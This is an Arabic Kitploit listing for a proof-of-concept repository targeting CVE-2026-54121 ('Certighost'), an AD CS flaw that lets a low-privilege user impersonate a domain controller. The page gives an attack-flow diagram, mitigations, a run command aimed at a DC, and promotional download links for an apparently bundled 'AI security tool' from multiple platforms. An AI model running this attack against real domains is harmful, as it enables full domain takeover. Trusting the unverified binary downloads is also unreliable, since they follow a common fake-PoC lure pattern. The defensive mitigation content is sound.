Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-54121-Certighost — وحدة إثبات مفهوم لـ CVE-2026-54121 (Certighost)، تستغل التحقق من تسجيل AD CS عبر مستمعي LDAP/SMB المارقين لانتحال هوية وحدة تحكم المجال والتصعيد عبر PKINIT. | Kitploit
أدوات/GitHubGitHub/zerodayevil/cve-2026-54121-certighost
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالأدوات انتحال الشخصيةما بعد الاستغلالاختبار الاختراقالمصادقةالأوراق والأبحاثالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubzerodayevil/cve-2026-54121-certighost

CVE-2026-54121-Certighost

وحدة إثبات مفهوم لـ CVE-2026-54121 (Certighost)، تستغل التحقق من تسجيل AD CS عبر مستمعي LDAP/SMB المارقين لانتحال هوية وحدة تحكم المجال والتصعيد عبر PKINIT.

عرض المستودع
منذ 13س 41دلم تتم المراجعة بعد

🛡 وحدة أداة الأمن بالذكاء الاصطناعي
CVE-2026-54121: انتحال هوية خدمات شهادات Active Directory (Certighost)

وحدة تدقيق أمني رسمية لمنظومة أداة الأمن بالذكاء الاصطناعي


Latest Release Build Status Donations Telegram Channel License

🌐 عرض توضيحي على الويب • 📚 موقع المشروع • 💬 دردشة المجتمع

التنقل في الموقع: الرئيسية • التحديثات • التنزيلات • الوحدات

AI Security Tool Banner


🧠 نظرة مفاهيمية عامة

توفّر هذه الوحدة قدرات تشخيصية لـ CVE-2026-54121، الملقّبة بـ Certighost. توجد الثغرة داخل خدمات شهادات Active Directory (AD CS) خلال مرحلة التحقق من تسجيل شهادات حسابات الكمبيوتر.

يقوم المهاجم الذي يمتلك بيانات اعتماد نطاق عادية منخفضة الصلاحيات بإنشاء حساب كمبيوتر جديد وتقديم طلب شهادة يحتوي على سمات cdc (مستمع IP مُتحكَّم به) وrmd (FQDN وحدة التحكم بالمجال الهدف) المُتلاعَب بها. عندما تتصل سلطة الشهادة (CA) مرة أخرى للتحقق من هوية الجهاز، تقوم مستمعات LDAP (المنفذ 389) وSMB/LSA (المنفذ 445) الخبيثة بانتحال سمات هوية وحدة التحكم بالمجال الهدف (sAMAccountName، SID، dNSHostName). وهذا يخدع سلطة الشهادة لإصدار شهادة أصيلة لوحدة التحكم بالمجال، مما يسمح باختراق كامل للنطاق عبر PKINIT.

🎯 فلسفة التأثير الجوهري

"صادِق كمصادقة جهاز، وارتقِ إلى النطاق بأكمله."
يتجاوز Certighost أذونات قوالب AD CS التقليدية عبر تسميم خط أنابيب تحليل الهوية لدى سلطة الشهادة. الحصول على شهادة صالحة لوحدة التحكم بالمجال يمنح مصادقة PKINIT فورية، مما ينتج عنه كل من ذاكرة تخزين مؤقت لبيانات اعتماد TGT (.ccache) وتجزئة NT لوحدة التحكم بالمجال الهدف.

📊 مواصفات الثغرة

🕸 سيناريو الهجوم والبنية

root@kitploit:~
graph TD
    A[Low-Priv Domain User] -->|1. Create Computer Account| B[Domain Controller]
    A -->|2. Start Rogue SMB 445 / LDAP 389 Listeners| C[Attacker Machine]
    A -->|3. Submit Cert Request with cdc & rmd Attributes| D[Active Directory CA]
    D -->|4. CA Lookups Connect to Rogue Listeners| C
    C -->|5. Validate via Netlogon & Return Target DC Identity| D
    D -->|6. Issue Valid DC Certificate .pfx| A
    A -->|7. Perform PKINIT with DC Certificate| E[Full Domain Takeover / NT Hash Export]

🛡 قائمة التحقق من التخفيف

  • 🟢 تطبيق تحديثات الأمان: انشر تصحيحات Microsoft الرسمية التي تعالج CVE-2026-54121 على جميع خوادم AD CS.
  • 🟢 تقييد إنشاء حسابات الأجهزة: اضبط ms-DS-MachineAccountQuota على 0 لمنع المستخدمين غير الإداريين من إنشاء كائنات كمبيوتر جديدة.
  • 🟡 تقوية AD CS: عطّل قوالب الشهادات المعرّضة للخطر وتأكد من إيقاف EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6) ما لم يكن مطلوبًا صراحةً.
  • 🟡 تصفية الشبكة: احجب حركة SMB (445) وLDAP (389) الصادرة من خوادم سلطة الشهادة إلى محطات العمل العشوائية.

💻 كيفية تشغيل هذه الوحدة

⚠️ مهم: صُمِّمت هذه الوحدة لإجراء اختبارات تشخيصية آمنة ضمن إطار عمل أداة الأمن بالذكاء الاصطناعي. نفّذها فقط ضد أهداف مُصرَّح بها وبصلاحيات إدارية مرتفعة.

1️⃣ تثبيت أداة الأمن بالذكاء الاصطناعي

لتنفيذ نصوص التشخيص والمراقبة، ثبّت إطار عمل أداة الأمن بالذكاء الاصطناعي الأساسي:

2️⃣ تثبيت التبعيات والتنفيذ

ثبّت مكتبات Python المطلوبة لمستمعات LDAP/SMB الخبيثة ومعالجة الشهادات:

root@kitploit:~
# Install python dependencies
sudo pip install --break-system-packages git+https://github.com/fortra/impacket.git cryptography pyasn1 asn1crypto pycryptodome dnspython

# Execute Certighost proof-of-concept (Requires root for ports 389/445)
sudo python3 certighost.py -d playground.local -u lowpriv -p 'Password1234' --dc-ip 192.168.1.10

🔍 وحدات التدقيق الأمني ومستودعات إثبات المفهوم

وحدات فحص الثغرات، ونصوص إثبات المفهوم، ومستودعات البحث التي يصونها مجتمعنا:

🔥 تنفيذ التعليمات البرمجية عن بُعد (RCE) وثغرات الشبكة 4 وحدات
  • CVE-2026-41089 — استغلال تنفيذ التعليمات البرمجية عن بُعد في Netlogon @ZeroDayEvil
  • CVE-2026-20805 — إثبات مفهوم تنفيذ التعليمات البرمجية عن بُعد في Windows @ZeroDayEvil
  • CVE-2026-41096 — وحدة فحص ثغرة RCE الحرجة @ZeroDayEvil
  • CVE-2026-24291 — تنفيذ التعليمات البرمجية عن بُعد عبر بروتوكول الشبكة @ZeroDayVPN
🛡 رفع الصلاحيات (EoP) والخدمات 3 وحدات
  • CVE-2026-54121 — انتحال هوية وحدة التحكم بالمجال عبر AD CS Certighost @ZeroDayEvil
  • CVE-2026-66804 — رفع الصلاحيات في خدمة CrossDevice @ZeroDayVPN
  • CVE-2026-50416 — تحليل مكتوب وإثبات مفهوم لرفع الصلاحيات المحلي @ZeroDayEvil
📚 أبحاث الثغرات والتحليلات المكتوبة وحدتان
  • CVE-2026-42978 — تحليل تقني معمّق وبحث إثبات مفهوم @ZeroDayEvil
  • CVE-2026-83991 — تحليل مكتوب كامل وعرض توضيحي للاستغلال @ZeroDayVPN

⚖️ الترخيص وإخلاء المسؤولية القانوني

🚨 إخلاء المسؤولية

تُقدَّم هذه الأداة والتحليل الأمني حصريًا لأغراض تدقيق الأنظمة المُصرَّح به، والبحث الدفاعي، ومهام اختبار الاختراق.
يُعدّ تنفيذ CVE-2026-54121 ضد بيئات النطاق دون إذن كتابي صريح من مالك النظام غير قانوني. لا يتحمّل المؤلفون أي مسؤولية عن الاختراق غير المُصرَّح به للنطاق، أو فقدان البيانات، أو تعطّل الأنظمة.

🔄 المساهمة والمجتمع

نرحّب بمساهمات مجتمع أبحاث الأمن! مجالات المساهمة الرئيسية:

  1. تكاملات الذكاء الاصطناعي: إضافة مزوّدي LLM جدد وتطوير وكلاء أمنيين متخصصين.
  2. الأدوات الأمنية: تطوير وحدات الثغرات ودمج أدوات الفحص عبر سطر الأوامر.
  3. التحسين: تعزيز سرعة المحلّل، وسلامة التنفيذ، ومنطق التخزين المؤقت.
  4. التوثيق: كتابة الأوراق البحثية والأدلة والترجمات المحلية.

🔗 التواصل والدعم

  • الموقع الرسمي: ZeroDayEvil.com
  • التحليل التقني: تحليل Gist بواسطة H0j3n
  • إرشاد MSRC: دليل CVE-2026-54121
  • مشرف Telegram: @ZeroDayEvil
  • دردشة Telegram: @ZeroDyaTool_chat
  • قناة Telegram: @ZeroDyaTool_channel
  • رعاية المشروع: تبرعات PayPal
  • Open Collective: opencollective.com/ZeroDayEvil

أداة الأمن بالذكاء الاصطناعي — إعادة تصوّر سير عمل الطرفية والأتمتة لمتخصصي الأمن السيبراني.

تنزيل الأداة
المواصفةالقيمة المُعيَّنةملاحظات
معرّف CVECVE-2026-54121انتحال هوية خدمات شهادات Active Directory
تصنيف الخطورةحرجة (CVSS v3.1: 9.8)CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
نوع الثغرةCWE-287 / CWE-290مصادقة غير سليمة / تجاوز المصادقة عبر الانتحال
المكوّن المتأثرخدمات شهادات Active Directory (AD CS)تسجيل الشهادات وخط أنابيب التحقق من الهوية
ناقل الهجومالشبكةيُنفَّذ عن بُعد عبر بروتوكولات SMB وLDAP وRPC
الصلاحيات المطلوبةصلاحيات منخفضةحساب مستخدم نطاق قياسي (القدرة على إضافة حسابات أجهزة)
نظام التشغيل / المنصةالإصدارالبنية / الصيغةتاريخ الإصدارالحالةرابط التنزيل
🪟 Windowsv6.3.20مثبّت x64 (.exe)2026-09-08🟢 الأحدثتنزيل .exe
🪟 Windowsv6.3.20محمول x64 (.tar.gz)2026-09-08🟢 الأحدثتنزيل .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 مستقرتنزيل .dmg
🐧 Linuxv5.3.27عالمي x64 (.tar.gz)2026-09-01🟢 مستقرتنزيل .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 مستقرتنزيل .apk